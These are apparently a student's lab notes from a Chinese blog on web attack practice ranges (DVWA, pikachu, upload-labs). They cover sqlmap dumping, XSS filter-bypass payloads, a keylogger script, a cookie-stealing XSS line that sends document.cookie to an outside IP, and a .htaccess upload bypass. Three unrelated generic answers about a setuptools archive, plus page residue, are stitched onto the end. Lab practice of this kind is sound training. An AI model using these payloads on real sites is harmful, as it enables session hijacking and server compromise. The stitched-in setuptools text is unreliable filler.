网络安全C11-2025.4.12


1、使用Sqlmap工具完成对DVWA数据库的注入过程,要求按照库、表、列、内容的顺序进行注入

--dbs 列出数据库

--tables,-D 列出表格,可以指定数据库

--columns -T,-D 列出字段的信息,可以指定数据库,数据表,字段

--dump,-C,-T,-D,--start,--stop,--first,--last :获取表的数据

2、XSS
(1)完成DVWA靶场存储型XSS的漏洞练习

中等

message参数中使用addslashes(),识别预定义字符:单引号(')、双引号(")、反斜杠(\)和 NULL

name参数中替换script为空

方法:

在name标签中:

大小写绕过 <SCRIPT>alert(1)</SCRIPT>

双写绕过 <scr<script>ipt>alert(1)</scr<script>ipt>

采用其他标签 <img src=x οnerrοr=alert(1)>

高等

message参数中使用addslashes()

name中参数使用正则表达式

方法:在name参数中采用其他事件

<img src=x οnerrοr=alert(1)>

(2)使用pikachu平台练习XSS键盘记录、前台XSS盲打攻击获取cookie,利用cookie实现登录

在pikachu中存在rk.js,可以监视用户输出的键盘记录

rk.js

定义ajax与xl两个类,定义onkeypress方法,定义realkey接收从键盘传回来的记录,将记录存储到xl里

将记录存储在postdate中,再将该类发送给rkserver.php

rkserver.php

接收传送的值,在后端运行

在具有xss漏洞的正常服务器中插入该代码

内容未显示,代表被解析

访问恶意服务器,完成对该正常服务器的键盘记录

xss获取cookie

cookie.php

该文件定义了获取用户请求信息.

pyload:

<script>document.write('<img src="http://47.108.95.46:8000/pkxss/xcookie/cookie.php?cookie='+document.cookie+'"/>')</script>

通过盲打xss,在登陆后台时,触发该代码执行,获取用户

在cookie-editor中输入cookie值,再输入原网站,完成登录


(3)使用beef制作钓鱼页面,克隆任意站点的登录页面并获取用户登录的账号密码

启动失败了,没搞懂

3、文件上传
(1)客户端绕过练习

js禁用

F12 F1 js禁用

后缀名绕过

该代码是基于前端的代码,只允许jpg png gif 后缀的文件上传

传输get型参数

post型可以用蚁键连接或者使用hackbar post 传参

修改前端代码

将调用checkFile 方法删除,可以直接上传php文件


(2)服务端黑名单绕过:给出.htaccess文件绕过的具体步骤

.htaccess文件绕过 (pass-04)

.htaccess为分布配置文件,可以指定自己目录下的配置规则

中间件为apache时,没有对.htaccess文件进行检测

.htaccess文件:

<FilesMatch "1.jpg">

Sethandler application/x-httpd-php

</FilesMatch>

(将1.jpg的文件以PHP文件来解析)

(将具有php格式的文件以php文件来解析)

<IfModule mime_module>

SetHandler application/x-httpd-php

</IfModule>

上传该文件会使得该服务器出错,因为会使部分文件以php文件解析,无法完成功能

在上传.htaccess文件后,更改配置文件,使得上传的1.jpg文件以php解析,完成上传

### 回答1: setuptools-0.6c11.tar.gz是一个Python软件包的压缩文件。Setuptools是Python程序的一个工具集,用于构建、安装和分发Python包。 在Python中,包管理是一个重要的任务,使得程序员能够轻松地安装和管理库和模块。Setuptools是一个被广泛使用的Python软件包,它提供了一系列功能,以简化包的安装和分发过程。 setuptools-0.6c11.tar.gz文件是一个压缩文件,可以通过解压缩来获取其中的内容。通常,该文件包含了setuptools的源代码和其他相关文件,以供开发者使用。 要使用setuptools-0.6c11.tar.gz,首先需要解压缩压缩文件。可以使用压缩软件或命令行工具来完成这个任务。解压缩后,你将得到一个目录,里面包含了setuptools的源代码和其他文件。 接下来,你可以将解压后的文件拷贝到你的Python程序所在的目录,以便可以在编程中使用setuptools提供的功能。可以按照setuptools的文档或示例代码来学习如何使用它。 通过setuptools,你可以方便地安装其他Python软件包,使用其提供的命令行工具进行包的安装、升级和卸载。setuptools还提供了一套API,以便开发者能够在自己的程序中动态加载和使用Python模块。 总之,setuptools-0.6c11.tar.gz是一个包含setuptools工具集的压缩文件,用于帮助Python开发者更方便地构建、安装和分发Python包。通过解压缩和使用其中的文件,你可以轻松地集成setuptools到你的Python程序中,以便更高效地管理包和模块。 ### 回答2: setuptools-0.6c11.tar.gz是一个Python软件包,用于在Python环境中安装和管理其他软件包。它是Python的一个重要工具,被广泛用于Python包的分发和安装过程。 这个文件是一个压缩包(gz格式),它包含了setuptools软件包的源代码和相关文件。要使用该软件包,用户需要先将其解压缩。 在解压缩之后,用户可以通过运行安装命令来安装setuptools。安装过程非常简单,只需要在命令行输入相应的命令即可。 安装完成后,setuptools将会添加一些额外的功能和命令到Python环境中。这些功能包括自动解决Python软件包的依赖关系、自动生成和安装软件包的二进制分发版本、提供一些命令行工具等。 此外,setuptools还提供了一些方便的函数和类,用于开发Python包和处理软件包相关的任务。用户可以使用这些工具来构建、打包、测试和发布自己的Python软件包。 总的来说,setuptools-0.6c11.tar.gz是一个重要的Python软件包,它简化了Python软件包的安装和管理过程,为Python开发者提供了很多便利的功能和工具。它被广泛认可和使用,并且在Python社区中得到了大量的支持和贡献。 ### 回答3: setuptools-0.6c11.tar.gz 是一个Python的包管理工具,用于帮助开发者安装和管理Python包。 在Python的生态系统中,有许多第三方库和模块可以帮助我们实现各种功能。而 setuptool 就是一个帮助我们管理这些第三方库和模块的工具。 setuptools-0.6c11.tar.gz 是 setuptools 的一个版本压缩包。压缩包中包含了 setuptool 的所有源代码和相关文件。我们可以通过解压这个压缩包,然后在Python环境中运行安装脚本来安装 setuptool。 安装好 setuptool 后,我们可以使用它来方便地下载和安装其他的Python包。只需在命令行中使用类似以下的命令: ``` pip install package_name ``` setuptools 还提供了一系列的命令和函数,用于帮助我们创建和打包自己的Python包,提供易于安装和分发的方式。我们可以使用命令行工具或编写脚本来执行这些操作。 总之,setuptools-0.6c11.tar.gz 是一个Python的包管理工具的压缩包,通过安装setuptools,我们可以更方便地安装、管理和分发Python包。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值